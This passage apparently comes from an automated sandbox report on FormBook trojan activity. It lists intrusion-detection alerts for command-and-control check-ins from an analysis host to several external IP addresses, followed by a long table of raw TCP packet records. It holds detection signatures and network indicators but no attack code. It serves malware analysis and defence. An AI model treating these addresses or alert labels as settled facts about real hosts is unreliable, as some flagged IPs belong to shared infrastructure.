                                                                                              04/24/24-07:27:26.171805TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975780192.168.2.4162.240.81.18
                                                                                              04/24/24-07:27:16.511687TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975480192.168.2.4162.240.81.18
                                                                                              04/24/24-07:28:20.015732TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977180192.168.2.434.149.87.45
                                                                                              04/24/24-07:26:55.165807TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974980192.168.2.4172.217.16.36
                                                                                              04/24/24-07:27:47.299002TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976280192.168.2.464.190.62.22
                                                                                              04/24/24-07:28:03.112780TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976680192.168.2.4118.27.122.214

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Apr 24, 2024 07:26:06.635162115 CEST4974080192.168.2.480.240.20.220
                                                                                              Apr 24, 2024 07:26:06.937114954 CEST804974080.240.20.220192.168.2.4
                                                                                              Apr 24, 2024 07:26:06.937258005 CEST4974080192.168.2.480.240.20.220
                                                                                              Apr 24, 2024 07:26:07.020849943 CEST4974080192.168.2.480.240.20.220
                                                                                              Apr 24, 2024 07:26:07.322658062 CEST804974080.240.20.220192.168.2.4
                                                                                              Apr 24, 2024 07:26:07.322947025 CEST804974080.240.20.220192.168.2.4
                                                                                              Apr 24, 2024 07:26:07.322971106 CEST804974080.240.20.220192.168.2.4
                                                                                              Apr 24, 2024 07:26:07.323124886 CEST4974080192.168.2.480.240.20.220
                                                                                              Apr 24, 2024 07:26:07.326181889 CEST4974080192.168.2.480.240.20.220
                                                                                              Apr 24, 2024 07:26:07.627676010 CEST804974080.240.20.220192.168.2.4
                                                                                              Apr 24, 2024 07:26:22.799576044 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:23.072180033 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.072361946 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:23.075793982 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:23.349987984 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.555524111 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.555547953 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.555588007 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.555622101 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.555694103 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.555732965 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.555749893 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:23.555795908 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:23.555804014 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.555820942 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.555876970 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:23.555886030 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.555938005 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.555983067 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:23.829082012 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.829106092 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.829123020 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.829159021 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:23.829268932 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.829315901 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.829317093 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:23.829395056 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.829432964 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:23.829514980 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.829603910 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.829648972 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:23.829701900 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.829794884 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.829838991 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:23.829920053 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.830091000 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.830136061 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:23.830151081 CEST8049742157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:23.830197096 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:24.600296974 CEST4974280192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:26.413398027 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:26.675060034 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:26.675286055 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:26.677110910 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:26.938533068 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.152697086 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.152719021 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.152730942 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.152786970 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.152801991 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.152848005 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.152880907 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.152926922 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.152955055 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.152961969 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.153042078 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.153075933 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.153110981 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.153167009 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.153203011 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.414510965 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414532900 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414546013 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414592028 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414602041 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.414635897 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414644003 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.414686918 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414729118 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.414743900 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414830923 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414868116 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414875984 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.414943933 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.414992094 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.415009022 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.415052891 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.415091991 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.415121078 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.415163040 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:28.184490919 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.202815056 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.470438004 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.470596075 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.472825050 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.740849018 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.740916014 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.740927935 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.740946054 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.740959883 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.741014957 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.741149902 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951217890 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951241970 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951257944 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951309919 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.951334953 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951373100 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.951404095 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951417923 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951452971 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.951467037 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951481104 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951517105 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:29.951539040 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951611042 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:29.951649904 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.218982935 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219012022 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219043016 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219108105 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219145060 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.219201088 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219255924 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.219280958 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219295025 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219377041 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.219486952 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219568014 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.219638109 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219702959 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219722986 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219767094 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.219815969 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.219882011 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.219904900 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.220015049 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.220052958 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.220083952 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.220097065 CEST8049744157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:30.220176935 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:30.981491089 CEST4974480192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:32.000026941 CEST4974580192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:32.275774956 CEST8049745157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:32.275891066 CEST4974580192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:32.277775049 CEST4974580192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:32.552330971 CEST8049745157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:32.748277903 CEST8049745157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:32.748301029 CEST8049745157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:32.748483896 CEST4974580192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:32.751262903 CEST4974580192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:33.025886059 CEST8049745157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:46.287801027 CEST4974680192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:46.606247902 CEST8049746172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:46.606408119 CEST4974680192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:46.608926058 CEST4974680192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:46.908231974 CEST8049746172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:46.908305883 CEST4974680192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:46.926695108 CEST8049746172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:47.027081966 CEST8049746172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:47.027110100 CEST8049746172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:47.027128935 CEST8049746172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:47.027328014 CEST4974680192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:48.121757984 CEST4974680192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:49.140527010 CEST4974780192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:49.461127043 CEST8049747172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:49.461270094 CEST4974780192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:49.463195086 CEST4974780192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:49.759095907 CEST8049747172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:49.759186029 CEST4974780192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:49.780961990 CEST8049747172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:49.881474972 CEST8049747172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:49.881500006 CEST8049747172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:49.881544113 CEST4974780192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:49.881623030 CEST8049747172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:49.881671906 CEST4974780192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:50.965524912 CEST4974780192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:51.990775108 CEST4974880192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:52.308691025 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.309012890 CEST4974880192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:52.311630964 CEST4974880192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:52.615502119 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.615816116 CEST4974880192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:52.629520893 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.629568100 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.629595995 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.629898071 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.629981995 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.630063057 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.630084991 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.630203009 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.630255938 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.731326103 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.731362104 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.731378078 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.731389046 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:52.731481075 CEST4974880192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:52.934020996 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:53.050283909 CEST8049748172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:54.845704079 CEST4974980192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:55.163733959 CEST8049749172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:55.163835049 CEST4974980192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:55.165807009 CEST4974980192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:55.470524073 CEST8049749172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:55.470688105 CEST4974980192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:55.484617949 CEST8049749172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:55.586297035 CEST8049749172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:55.586327076 CEST8049749172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:55.586340904 CEST8049749172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:26:55.586489916 CEST4974980192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:55.588921070 CEST4974980192.168.2.4172.217.16.36
                                                                                              Apr 24, 2024 07:26:55.906735897 CEST8049749172.217.16.36192.168.2.4
                                                                                              Apr 24, 2024 07:27:02.511817932 CEST4975080192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:02.678076982 CEST8049750203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:02.678215027 CEST4975080192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:02.680174112 CEST4975080192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:02.845627069 CEST8049750203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:02.859771967 CEST8049750203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:02.859787941 CEST8049750203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:02.859877110 CEST4975080192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:04.184303999 CEST4975080192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:05.203655005 CEST4975180192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:05.369210958 CEST8049751203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:05.369312048 CEST4975180192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:05.371216059 CEST4975180192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:05.537224054 CEST8049751203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:05.556513071 CEST8049751203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:05.557482958 CEST8049751203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:05.557550907 CEST4975180192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:06.887800932 CEST4975180192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:07.906342030 CEST4975280192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:08.072356939 CEST8049752203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:08.072453976 CEST4975280192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:08.074906111 CEST4975280192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:08.240760088 CEST8049752203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:08.240784883 CEST8049752203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:08.240852118 CEST8049752203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:08.240870953 CEST8049752203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:08.240911007 CEST8049752203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:08.240988970 CEST8049752203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:08.252882004 CEST8049752203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:08.252943039 CEST8049752203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:08.252985001 CEST4975280192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:09.590589046 CEST4975280192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:10.609505892 CEST4975380192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:10.775135994 CEST8049753203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:10.775235891 CEST4975380192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:10.777631998 CEST4975380192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:10.943114042 CEST8049753203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:10.956478119 CEST8049753203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:10.956667900 CEST8049753203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:10.956873894 CEST4975380192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:10.960549116 CEST4975380192.168.2.4203.161.46.103
                                                                                              Apr 24, 2024 07:27:11.126022100 CEST8049753203.161.46.103192.168.2.4
                                                                                              Apr 24, 2024 07:27:16.330296040 CEST4975480192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:16.509468079 CEST8049754162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:16.509588003 CEST4975480192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:16.511687040 CEST4975480192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:16.690531969 CEST8049754162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:16.690617085 CEST8049754162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:16.690632105 CEST8049754162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:16.690645933 CEST8049754162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:16.690886974 CEST4975480192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:18.028686047 CEST4975480192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:20.555830956 CEST4975580192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:20.736825943 CEST8049755162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:20.740777016 CEST4975580192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:20.740777016 CEST4975580192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:20.921674967 CEST8049755162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:20.921850920 CEST8049755162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:20.921866894 CEST8049755162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:20.921885967 CEST8049755162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:20.923791885 CEST4975580192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:20.926806927 CEST4975580192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:22.246798038 CEST4975580192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:23.266319990 CEST4975680192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:23.447231054 CEST8049756162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:23.448925972 CEST4975680192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:23.451829910 CEST4975680192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:23.632600069 CEST8049756162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:23.632733107 CEST8049756162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:23.632837057 CEST8049756162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:23.632946014 CEST8049756162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:23.632977962 CEST4975680192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:23.633028984 CEST8049756162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:23.633105993 CEST8049756162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:23.633126020 CEST4975680192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:23.633168936 CEST8049756162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:23.633291960 CEST8049756162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:23.640779972 CEST4975680192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:24.965729952 CEST4975680192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:25.985171080 CEST4975780192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:26.166591883 CEST8049757162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:26.168997049 CEST4975780192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:26.171804905 CEST4975780192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:26.353152037 CEST8049757162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:26.353187084 CEST8049757162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:26.353208065 CEST8049757162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:26.353230953 CEST8049757162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:26.353347063 CEST4975780192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:26.353485107 CEST4975780192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:26.356439114 CEST4975780192.168.2.4162.240.81.18
                                                                                              Apr 24, 2024 07:27:26.537687063 CEST8049757162.240.81.18192.168.2.4
                                                                                              Apr 24, 2024 07:27:31.867671967 CEST4975880192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:32.168982029 CEST8049758217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:32.173019886 CEST4975880192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:32.176814079 CEST4975880192.168.2.4217.160.0.111
                                                                                              Apr 24, 2024 07:27:32.478018045 CEST8049758217.160.0.111192.168.2.4
                                                                                              Apr 24, 2024 07:27:32.482180119 CEST8049758217.160.0.111192.168.2.4
